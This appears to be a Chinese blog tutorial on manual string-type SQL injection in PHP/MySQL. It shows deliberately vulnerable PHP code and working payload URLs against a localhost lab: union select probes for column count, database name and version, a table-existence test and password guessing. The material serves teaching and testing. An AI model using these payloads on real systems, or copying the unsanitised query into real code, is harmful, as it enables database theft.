SQL注入系列之PHP+Mysql手动注入(二)----字符型

最新推荐文章于 2022-09-13 22:58:40 发布
最新推荐文章于 2022-09-13 22:58:40 发布
阅读量284 收藏 2
点赞数
分类专栏: 网络攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangliu463884153/article/details/80029043
版权

一、什么是字符型注入以及原理

 

1)字符型注入简介

 

字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类型。

 

字符型注入就是把输入的参数当做字符串来对数据库进行查询,字符型注入在sql语句中都采用单引号括起来。

 
 
2)基本原理:

看看这条SQL语句

[html]  view plain  copy
 
  1. $query="select first_name from users where id='$_GET['id']'";  
这句SQL的语句就是基于用户输入的id在users表中找到相应的first_name,正常用户当然会输入例如1,2等等。但是如果有人输入这样的内容呢?

1' union select database() #;

这样的话这句SQL语句就变成了这样

select first_name from users where id='1'unionselect database()#'
 
这样的话,我们不仅可以得到id=1的first_name,还可以得到当前数据库的相关信息,这是开发人员所没有想到的。以上只是一个简单的SQL注入的例子。 

从根本上讲,当开发人员对用户的输入过滤不严,造成了用户可以通过输入SQL语句控制数据库,就会产生SQL注入漏洞。

 

 

简而言之,基于字符型的SQL注入即存在SQL注入漏洞的URL参数为字符串类型(需要使用单引号表示)。

 

 

字符型SQL注入的关键—–单引号的闭合

 

MySQL数据库对于单引号的规则如下:

  • 单引号必须成对出现,否则数据库就会报错。
  • 如果两个单引号之间内容为空,数据库自动忽略。

应用程序数据库的字符型SQL语句为:

  • select * from tables where idproduct=’13’;
  • select * from tables where name=’fendo’;
  • select * from tables where data=’01/01/2017’;

二、字符型注入与数字型注入的区别

 

 

字符:除数字之外都是字符

数字:0-9

 

两种SQL语句的区别:

 

数字型: SELECT 列 FROM 表 WHERE 数字型列=值
字符型: SELECT 列 FROM 表 WHERE 字符型列=’值’

 

三、如何判断是否是字符型注入

 

测试注入语句是:

 

xx' and '1'=1--' 


xx' and '1=2--'


如果第一个页面正常,而使用第二个的时候页面出现错误则,该url可以进行字符型注入

 

 

 

 

四、字符型注实战

 

测试源码:

 

[html]  view plain  copy
 
  1. <?  
  2. $name=$_GET['username'];  
  3. $conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库  
  4. if($conn){  
  5.     echo "连接数据库成功!";   
  6. }//判断连接是否成功  
  7. echo "<br>";  
  8. mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库(fendo)  
  9. $sql="select * from user where username = '$name'"; //字符型搜索语句  
  10. $result=mysql_query($sql);  
  11. while($row = mysql_fetch_array($result)){   
  12.     echo "用户ID:".$row['id']."<br >";  
  13.     echo "用户名:".$row['username']."<br >";  
  14.     echo "用户密码:".$row['password']."<br >";  
  15.     echo "用户邮箱:".$row['email']."<br >";  
  16. }  
  17. mysql_close($conn); //关闭数据库连接  
  18. echo "<hr>";  
  19. echo "你当前执行的sql语句为:"."<br >";  
  20. echo $sql;  
  21. ?>  

 

表数据:

 

 

 

当我们访问:http://localhost/sqltest/char.php?username=admin 时

 

 

执行的代码是:

 

 

[html]  view plain  copy
 
  1. $sql="select * from user where username = '$name'";  



 

解析成SQL就是 select  * from user where username = 'admin' 执行结果为

 

 

进行SQL注入:

 

1.猜字段数

 

使用union select 1,2,3,4.... 去猜。这里为4是正确说明字段数为4。

 

 

[html]  view plain  copy
 
  1. http://localhost/sqltest/char.php?username=admin' union select 1,2,3,4 and '1'='1  



 

 

爆出1,2,3 更换SQL语句得出当前的数据库名字与数据库版本

 

 

[html]  view plain  copy
 
  1. http://localhost/sqltest/char.php?username=admin' union select database(),version(),3,4 and '1'='1  



 

 

 

2.猜表名

 

获取表名使用 '+and+(select+count(*)+from+表名)>0+and+''=' 这种格式。

 

 

[html]  view plain  copy
 
  1. http://localhost/sqltest/char.php?username=admin'+and+(select+count(*)+from+user)>0+and+''='  



 

 

没报错说明存在user这个表。

 

3.猜密码

 

 

[html]  view plain  copy
 
  1. http://localhost/sqltest/char.php?username=admin' and password='fendo  


 

寂地沉
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql手动注入_SQL注入系列PHP+Mysql手动注入(一)----字符
weixin_34650199的博客
01-19 251
一、什么是字符注入以及原理1)字符注入简介字符串或串(String)是由数字、字母、下划线组成的一串字符。一般记为 s=“a1 a2 ···an ” (n>=0)。它是编程语言中表示文本的数据类字符注入就是把输入的参数当做字符串来对数据库进行查询,字符注入在sql语句中都采用单引号括起来。2)基本原理:看看这条SQL语句$query="selectfirst_namefrom...
SQL注入):pikachu(一):MySQL字符注入(post) --- 字符注入
天威一号
10-21 510
1、判断字段 SQL命令: a' order by 1#' 查询到第3个时,显示不正常,则有两个字段; 数据库执行的命令: select * from 表名 where username = 'a' order by 1#' 2、显示占位的数字,在网页上面可以显示看到数字能够显示的内容: union联合查询中,前面的查询结果和后面的查询结果都为真的,则都会显示。如果前面的查询结果是假的,则只会显...
sql注入学习笔记
qq_44897253的博客
12-02 3584
文章目录什么是sql注入sql注入的原理sql注入方法1.1数字注入1.2字符注入sql注入常见的绕过方式sqlmap的简单使用sql注入的危害sql注入的防范措施 什么是sql注入 sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 sql注入的原理 sql注入攻击是通过操作输入来修改
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8982
SQL注入原理-字符注入
SQL注入学习——sqli-labs闯关(Basic Challenges)
未完成的歌~的博客
07-28 2687
今天开始学习 SQL 注入的相关知识,通过 sqli-labs 靶场来练习。靶场地址SQL注入(SQL Injection)是一种常见的 Web 安全漏洞,攻击者通过构造SQL语句与后台数据库进行交互,达到获取或修改一些敏感数据,或者利用潜在的数据库漏洞进行攻击的目的。何为盲注?盲注就是在 sql 注入过程中,sql 语句执行后,查询的数据不能回显到前端页面上。此时,我们需要利用一些特殊的方法来得到数据,这个过程称之为盲注。盲注主要分为三类:基于布尔的 SQL 盲注基于时间的 SQL 盲注。........
sql注入-mysql注入
qq_38849692的博客
08-03 192
sql常用的注入语句 查询数据库----假设为 security select database(); 查询数据库中的表 select group_concat(table_name) from information_schema.tables where table_schema=database(); 查询表中的字段名(security.users表中的列) select group_concat(column_name) from information_schema.columns wh
php代码-PHP代码测试
07-16
预处理语句可以防止SQL注入攻击。 6. **代码调试**: 使用`var_dump`可以详细输出变量信息,`debug_backtrace`则提供调用堆栈信息,帮助定位问题。此外,Xdebug是一个强大的PHP调试工具,提供断点、步进执行等功能...
基于PHP的批量删除MySQL数据库相同前缀的数据表工具.zip
08-26
在安全考虑下,应使用参数化查询或预处理语句,防止SQL注入攻击。 3. **查询数据表**:使用`mysqli_query()`或`PDO::query()`执行SQL查询,如`SHOW TABLES;`来获取数据库中的所有表名。 4. **匹配和筛选**:遍历...
[企业政府]MYPHP企业建站系统 v4.2 UTF-8 简繁英三语版_myphpv4.zip
最新发布
03-19
9. **安全防护**:考虑到企业和政府的数据敏感性,MYPHP系统应该有完善的安全措施,如防止SQL注入、XSS攻击,以及定期备份和恢复功能。 10. **插件与扩展**:一个成熟的建站系统往往提供丰富的插件和扩展,以增加...
PHP论文格式化系统——前台的设计与实现(源代码+论文).rar
07-06
1. 安全性:系统应有防止SQL注入、XSS攻击等措施,同时对上传文件进行类和大小的限制,避免恶意文件。 2. 性能优化:采用缓存机制减少数据库查询,提高处理效率。合理设计数据库结构,避免冗余数据。 五、项目...
json、mybatis、MySQL、SSM全部jar包
10-12
MySQL是一个关系数据库管理系统,由瑞典MySQL AB公司开发,目前属于Oracle公司。它是开源的,被广泛应用于互联网上的中小网站中。MySQL以其高速度和可靠性而著名,支持多种操作系统,并且提供了多种编程语言的...
SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证
weixin_37537965的博客
12-26 767
DVWA-&gt;SQL Injection //后台sql语句 select * from users where username='$name' and password='$pwd'; 当查询到数据表中存在同时满足 username 和 password 字段的数据时,会返回登录成功。例如,用户名为admin,密码为123时: //实际执行语句 select * from use...
mysql ii_Training: MySQL II
weixin_29268267的博客
02-07 111
首先关于SQL的select语句SELECT * FROM users WHERE username='$username'*代表着搜索全部,fromusername为在username表中搜索,where限定username为输入的值源代码截图我们可以看到表有三个关键字,分别是userid,username和password,因此在后面的构造时,也应该构造这三个参数。首先说原理(纠结了半天在大...
sql注入数字字符的原理 //(dvwa实战 sql injection low)
weixin_43749051的博客
03-04 1764
1、数字注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字注入。 测试步骤: (1) 加单引号,URL:www.text.com/text.php?id=3’ 对应的sql:select * from table where id=3’ 这时sql语句出错,不符合sql语法,让数据库系统报错,如果没报错就说明 ‘ 被过滤了,这样不存在注入的可能。 (2) 加and 1=1 ,URL:www.text.com/text.php?id=3 and 1=1 对应的sql:select *
SQL注入---测试工程师必知必会
啊Sei的博客
06-02 2031
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息
mysql注入ctf_BUUCTF[归纳]sql注入相关题目
weixin_42322347的博客
02-02 1574
这是我自己对于sql注入的部分ctf题的归纳,均来自buuctf的平台环境。[0CTF 2016]piapiapia我尝试了几种payload,发现有两种情况。第一种:Invalid user name第种:Invalid user name or password第一步想到的是盲注或者报错,因为fuzz一波有一些是没有过滤掉的。对于后台的拦截我想到的可能是黑名单或者是正则表达式匹配。先不管,...
CTF-SQL注入
weixin_44770698的博客
06-16 5042
CTF-SQL注入题目整理
DVWA系列(一)----DVWA简介
热门推荐
你身后的人
04-21 1万+
一、DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA是randomstorm的一个开源项目。如果你更多的了解randomstorm的服务和产品你可以访问他们官方网站www.ran...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值